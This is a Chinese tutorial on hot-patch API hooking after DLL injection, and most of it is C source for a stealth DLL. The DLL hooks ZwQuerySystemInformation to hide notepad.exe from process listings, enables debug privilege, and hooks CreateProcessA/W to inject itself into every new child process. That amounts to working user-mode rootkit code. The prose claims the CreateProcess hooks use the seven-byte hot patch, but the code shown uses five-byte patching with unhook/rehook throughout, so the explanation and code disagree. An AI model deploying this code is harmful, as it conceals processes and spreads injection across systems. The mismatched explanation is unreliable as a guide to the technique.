通过注入DLL后使用热补丁钩取API

0x00 对比修改API的前五个字节钩取API

对前一种方法钩取API的流程梳理如下：

1. 注入相应的DLL
2. 修改原始AI的函数的前五个字节跳往新函数（钩取API）
3. 跳往新函数后需调用原始API的功能，所以先把那五个替换的字节换回来（脱钩）
4. 调用原始API
5. 再次注入dll
6. 再次挂钩

所以每次进入新函数后就要反复进行挂钩脱钩，这是一个极度消耗cpu的工作，特别是对于要整个系统的进程都要注入dll时就更要命了。

现在有一种更好的方式来弥补这种方法的不足，这就是热补丁法，他利用的是更改API函数地址前的七个字节的无功能性，来实现的。

如下图：

我们从上图可以知道这些API函数前面的七个字节都是

90 Nop

90 Nop

90 Nop

90 Nop

90 Nop

8BFF MOV EDI,EDI

这六句话共占7个字节，并没有实际意义而8BFF MOV EDI,EDI

是API的首地址。所以更改这里并不会对函数调用产生影响。所以这里跳转至新函数后，新函数再调用原始API时就不用脱钩。这样就给系统减小了负担，也减少了崩溃的风险。

0x01 实现代码

代码的与五字补丁不同的地方在于，找到原始API地址之后是对API首地址的后两个字节以及首地址前的五个字节进行修改，并且在新的函数中调用原始API时不用进行脱钩操作。

代码如下:

#include "windows.h"

#include "stdio.h"

#include "tchar.h"

#define STR_MODULE_NAME (L"stealth2.dll")

#define STR_HIDE_PROCESS_NAME (L"notepad.exe")

#define STATUS_SUCCESS (0x00000000L)

typedef LONG NTSTATUS;

//系统信息结构体

typedef enum _SYSTEM_INFORMATION_CLASS {

SystemBasicInformation = 0,

SystemPerformanceInformation = 2,

SystemTimeOfDayInformation = 3,

SystemProcessInformation = 5,

SystemProcessorPerformanceInformation = 8,

SystemInterruptInformation = 23,

SystemExceptionInformation = 33,

SystemRegistryQuotaInformation = 37,

SystemLookasideInformation = 45

} SYSTEM_INFORMATION_CLASS;

//进程信息结构体

typedef struct _SYSTEM_PROCESS_INFORMATION {

ULONG NextEntryOffset;

BYTE Reserved1[52];

PVOID Reserved2[3];

HANDLE UniqueProcessId;

PVOID Reserved3;

ULONG HandleCount;

BYTE Reserved4[4];

PVOID Reserved5[11];

SIZE_T PeakPagefileUsage;

SIZE_T PrivatePageCount;

LARGE_INTEGER Reserved6[6];

} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

//PFZWQUERYSYSTEMINFORMATION是一个函数指针

/*

一个指向参数为

SYSTEM_INFORMATION_CLASS SystemInformationClass,

PVOID SystemInformation,

ULONG SystemInformationLength,

PULONG ReturnLength

的返回值类型为NTSTATUS的函数，这个函数其实就是ZwQuerySystemInformation()API函数，NTSTATUS是一个长整型数。

*/

typedef NTSTATUS (WINAPI *PFZWQUERYSYSTEMINFORMATION)(

SYSTEM_INFORMATION_CLASS SystemInformationClass,

PVOID SystemInformation,

ULONG SystemInformationLength,

PULONG ReturnLength);

/*

PFCREATEPROCESSA是一个函数指针

这个指针指向参数为：

LPCTSTR lpApplicationName,

LPTSTR lpCommandLine,

LPSECURITY_ATTRIBUTES lpProcessAttributes,

LPSECURITY_ATTRIBUTES lpThreadAttributes,

BOOL bInheritHandles,

DWORD dwCreationFlags,

LPVOID lpEnvironment,

LPCTSTR lpCurrentDirectory,

LPSTARTUPINFO lpStartupInfo,

LPPROCESS_INFORMATION lpProcessInformation

的返回值类型为BOOL的函数，这个函数其实就是CreateProcessA（）API函数

*/

typedef BOOL (WINAPI *PFCREATEPROCESSA)(

LPCTSTR lpApplicationName,

LPTSTR lpCommandLine,

LPSECURITY_ATTRIBUTES lpProcessAttributes,

LPSECURITY_ATTRIBUTES lpThreadAttributes,

BOOL bInheritHandles,

DWORD dwCreationFlags,

LPVOID lpEnvironment,

LPCTSTR lpCurrentDirectory,

LPSTARTUPINFO lpStartupInfo,

LPPROCESS_INFORMATION lpProcessInformation

);

/*

PFCREATEPROCESSW是一个函数指针

这个指针指向参数为：

LPCTSTR lpApplicationName,

LPTSTR lpCommandLine,

LPSECURITY_ATTRIBUTES lpProcessAttributes,

LPSECURITY_ATTRIBUTES lpThreadAttributes,

BOOL bInheritHandles,

DWORD dwCreationFlags,

LPVOID lpEnvironment,

LPCTSTR lpCurrentDirectory,

LPSTARTUPINFO lpStartupInfo,

LPPROCESS_INFORMATION lpProcessInformation

的返回值类型为BOOL的函数，这个函数其实就是CreateProcessW（）API函数

*/

typedef BOOL (WINAPI *PFCREATEPROCESSW)(

LPCTSTR lpApplicationName,

LPTSTR lpCommandLine,

LPSECURITY_ATTRIBUTES lpProcessAttributes,

LPSECURITY_ATTRIBUTES lpThreadAttributes,

BOOL bInheritHandles,

DWORD dwCreationFlags,

LPVOID lpEnvironment,

LPCTSTR lpCurrentDirectory,

LPSTARTUPINFO lpStartupInfo,

LPPROCESS_INFORMATION lpProcessInformation

);

BYTE g_pOrgCPA[5] = {0,};

BYTE g_pOrgCPW[5] = {0,};

BYTE g_pOrgZwQSI[5] = {0,};

//替换原API函数首地址的前五个字节为NewCreateProcessA和NewCreateProcessW

BOOL hook_by_code(LPCSTR szDllName, LPCSTR szFuncName, PROC pfnNew, PBYTE pOrgBytes)

{

FARPROC pFunc;

DWORD dwOldProtect, dwAddress;

BYTE pBuf[5] = {0xE9, 0, };

PBYTE pByte;

pFunc = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);

pByte = (PBYTE)pFunc;

if( pByte[0] == 0xE9 )

return FALSE;

VirtualProtect((LPVOID)pFunc, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);

memcpy(pOrgBytes, pFunc, 5);

dwAddress = (DWORD)pfnNew - (DWORD)pFunc - 5;

memcpy(&pBuf[1], &dwAddress, 4);

memcpy(pFunc, pBuf, 5);

VirtualProtect((LPVOID)pFunc, 5, dwOldProtect, &dwOldProtect);

return TRUE;

}

//将被替换的API函数前五个字节换回去

BOOL unhook_by_code(LPCSTR szDllName, LPCSTR szFuncName, PBYTE pOrgBytes)

{

FARPROC pFunc;

DWORD dwOldProtect;

PBYTE pByte;

pFunc = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);

pByte = (PBYTE)pFunc;

if( pByte[0] != 0xE9 )

return FALSE;

VirtualProtect((LPVOID)pFunc, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);

memcpy(pFunc, pOrgBytes, 5);

VirtualProtect((LPVOID)pFunc, 5, dwOldProtect, &dwOldProtect);

return TRUE;

}

//提权函数

BOOL SetPrivilege(LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)

{

TOKEN_PRIVILEGES tp;

HANDLE hToken;

LUID luid;

if( !OpenProcessToken(GetCurrentProcess(),

TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,

&hToken) )

{

printf("OpenProcessToken error: %u\n", GetLastError());

return FALSE;

}

if( !LookupPrivilegeValue(NULL,             // lookup privilege on local system

lpszPrivilege,    // privilege to lookup

&luid) )          // receives LUID of privilege

{

printf("LookupPrivilegeValue error: %u\n", GetLastError() );

return FALSE;

}

tp.PrivilegeCount = 1;

tp.Privileges[0].Luid = luid;

if( bEnablePrivilege )

tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

else

tp.Privileges[0].Attributes = 0;

// Enable the privilege or disable all privileges.

if( !AdjustTokenPrivileges(hToken,

FALSE,

&tp,

sizeof(TOKEN_PRIVILEGES),

(PTOKEN_PRIVILEGES) NULL,

(PDWORD) NULL) )

{

printf("AdjustTokenPrivileges error: %u\n", GetLastError() );

return FALSE;

}

if( GetLastError() == ERROR_NOT_ALL_ASSIGNED )

{

printf("The token does not have the specified privilege. \n");

return FALSE;

}

return TRUE;

}

//注入函数，使用这个函数向新建的子进程注入stealth2.dll

BOOL InjectDll2(HANDLE hProcess, LPCTSTR szDllName)

{

HANDLE hThread;

LPVOID pRemoteBuf;

DWORD dwBufSize = (DWORD)(_tcslen(szDllName) + 1) * sizeof(TCHAR);

FARPROC pThreadProc;

pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize,

MEM_COMMIT, PAGE_READWRITE);

if( pRemoteBuf == NULL )

return FALSE;

WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllName,

dwBufSize, NULL);

pThreadProc = GetProcAddress(GetModuleHandleA("kernel32.dll"),

"LoadLibraryW");

hThread = CreateRemoteThread(hProcess, NULL, 0,

(LPTHREAD_START_ROUTINE)pThreadProc,

pRemoteBuf, 0, NULL);

WaitForSingleObject(hThread, INFINITE);

VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);

CloseHandle(hThread);

return TRUE;

}

//创建新的ZwQuerySystemInformation函数

NTSTATUS WINAPI NewZwQuerySystemInformation(

SYSTEM_INFORMATION_CLASS SystemInformationClass,

PVOID SystemInformation,

ULONG SystemInformationLength,

PULONG ReturnLength)

{

NTSTATUS status;

FARPROC pFunc;

PSYSTEM_PROCESS_INFORMATION pCur, pPrev;

char szProcName[MAX_PATH] = {0,};

//调用原始API前先脱钩

unhook_by_code("ntdll.dll", "ZwQuerySystemInformation", g_pOrgZwQSI);

//获取模块ntdll的函数ZwQuerySystemInformation的地址

pFunc = GetProcAddress(GetModuleHandleA("ntdll.dll"),

"ZwQuerySystemInformation");

//通过指针调用ZwQuerySystemInformation返回进程信息链表的首地址到SystemInformation。

status = ((PFZWQUERYSYSTEMINFORMATION)pFunc)

(SystemInformationClass, SystemInformation,

SystemInformationLength, ReturnLength);

//获取失败则退出

if( status != STATUS_SUCCESS )

goto __NTQUERYSYSTEMINFORMATION_END;

//当调用获取到的是进程信息时（SystemInformationClass这个参数可以是进程信息类，也可以是其他，具体的取MSDN上查询）

if( SystemInformationClass == SystemProcessInformation )

{

pCur = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;

while(TRUE)

{

if(pCur->Reserved2[1] != NULL)

{

//找到notePad.exe后操作链表将其删除，这样就达到了隐藏的目的

if(!_tcsicmp((PWSTR)pCur->Reserved2[1], STR_HIDE_PROCESS_NAME))

{

if(pCur->NextEntryOffset == 0)

pPrev->NextEntryOffset = 0;

else

pPrev->NextEntryOffset += pCur->NextEntryOffset;

}

else

pPrev = pCur;

}

if(pCur->NextEntryOffset == 0)

break;

//让指针指向下一项

pCur = (PSYSTEM_PROCESS_INFORMATION)((ULONG)pCur + pCur->NextEntryOffset);

}

}

__NTQUERYSYSTEMINFORMATION_END:

//退出之前先钩取，为下次循环做准备

hook_by_code("ntdll.dll", "ZwQuerySystemInformation",

(PROC)NewZwQuerySystemInformation, g_pOrgZwQSI);

return status;

}

//新建的CreateProcessA函数

BOOL WINAPI NewCreateProcessA(

LPCTSTR lpApplicationName,

LPTSTR lpCommandLine,

LPSECURITY_ATTRIBUTES lpProcessAttributes,

LPSECURITY_ATTRIBUTES lpThreadAttributes,

BOOL bInheritHandles,

DWORD dwCreationFlags,

LPVOID lpEnvironment,

LPCTSTR lpCurrentDirectory,

LPSTARTUPINFO lpStartupInfo,

LPPROCESS_INFORMATION lpProcessInformation

)

{

BOOL bRet;

//FARPROC是一个指向far过程的指针JMP跳转至指定far过程用得着

FARPROC pFunc;

// 调用原始API之前先脱钩unhook

unhook_by_code("kernel32.dll", "CreateProcessA", g_pOrgCPA);

// 调用原始的API

pFunc = GetProcAddress(GetModuleHandleA("kernel32.dll"), "CreateProcessA");

bRet = ((PFCREATEPROCESSA)pFunc)(lpApplicationName,

lpCommandLine,

lpProcessAttributes,

lpThreadAttributes,

bInheritHandles,

dwCreationFlags,

lpEnvironment,

lpCurrentDirectory,

lpStartupInfo,

lpProcessInformation);

// 向生成的子进程注入stealth32.dll

if( bRet )

InjectDll2(lpProcessInformation->hProcess, STR_MODULE_NAME);

// 功能完成之后再次钩取APIhook，为下次循环做准备

hook_by_code("kernel32.dll", "CreateProcessA",

(PROC)NewCreateProcessA, g_pOrgCPA);

return bRet;

}

//新建的NewCreateProcessW函数

BOOL WINAPI NewCreateProcessW(

LPCTSTR lpApplicationName,

LPTSTR lpCommandLine,

LPSECURITY_ATTRIBUTES lpProcessAttributes,

LPSECURITY_ATTRIBUTES lpThreadAttributes,

BOOL bInheritHandles,

DWORD dwCreationFlags,

LPVOID lpEnvironment,

LPCTSTR lpCurrentDirectory,

LPSTARTUPINFO lpStartupInfo,

LPPROCESS_INFORMATION lpProcessInformation

)

{

BOOL bRet;

FARPROC pFunc;

//// 调用原始API之前先脱钩unhook

unhook_by_code("kernel32.dll", "CreateProcessW", g_pOrgCPW);

//调用原来的API

pFunc = GetProcAddress(GetModuleHandleA("kernel32.dll"), "CreateProcessW");

bRet = ((PFCREATEPROCESSW)pFunc)(lpApplicationName,

lpCommandLine,

lpProcessAttributes,

lpThreadAttributes,

bInheritHandles,

dwCreationFlags,

lpEnvironment,

lpCurrentDirectory,

lpStartupInfo,

lpProcessInformation);

// 向新生成的子进程注入stealth2.dll

if( bRet )

InjectDll2(lpProcessInformation->hProcess, STR_MODULE_NAME);

// 再次钩取API，为下次循环做准备

hook_by_code("kernel32.dll", "CreateProcessW",

(PROC)NewCreateProcessW, g_pOrgCPW);

return bRet;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)

{

char            szCurProc[MAX_PATH] = {0,};

char            *p = NULL;

// 异常处理是注入不会发生在HideProc2.exe进程

GetModuleFileNameA(NULL, szCurProc, MAX_PATH);

p = strrchr(szCurProc, '\\');

if( (p != NULL) && !_stricmp(p+1, "HideProc2.exe") )

return TRUE;

// 提权

SetPrivilege(SE_DEBUG_NAME, TRUE);

switch( fdwReason )

{

case DLL_PROCESS_ATTACH :

// DLL载入后钩取三个API

hook_by_code("kernel32.dll", "CreateProcessA",

(PROC)NewCreateProcessA, g_pOrgCPA);

hook_by_code("kernel32.dll", "CreateProcessW",

(PROC)NewCreateProcessW, g_pOrgCPW);

hook_by_code("ntdll.dll", "ZwQuerySystemInformation",

(PROC)NewZwQuerySystemInformation, g_pOrgZwQSI);

break;

case DLL_PROCESS_DETACH :

// DLL卸载后对三个API脱钩

unhook_by_code("kernel32.dll", "CreateProcessA",

g_pOrgCPA);

unhook_by_code("kernel32.dll", "CreateProcessW",

g_pOrgCPW);

unhook_by_code("ntdll.dll", "ZwQuerySystemInformation",

g_pOrgZwQSI);

break;

}

return TRUE;

}

这里要注意的的是ZwQuerySystemInformation()API采用的是五字补丁法，故在新建的函数NewZwQuerySystemInformation()要先脱钩，至于原因，后面会讲到。而CreateProcessA()API函数以及CreateProcessW()API函数采用的是七字补丁法，所以我们在新函数调用NewCreateProcessA()以及NewCreateProcessW()调用原始API时不用脱钩就可以使用了。

0x02 七字补丁法的的缺点

相对于五字补丁法，七字补丁似乎完胜，即比它简单容易理解，还会减轻系统负担。但是事情往往没有那么简单。事实上五字补丁法几乎是万能的，只要找到API就可以进行钩取，而七字补丁法却不行。原因就在于很多API，特别是底层的API，比如ntdll中的API往往不能满足七字补丁法的使用条件，原因就是这些底层的API很短，没有足够的七个无用字节供你修改。比如前面的那个ZwQuerySystemInformation()API函数。所以使用七字补丁法前要确认API函数前面是否还有足够的空间。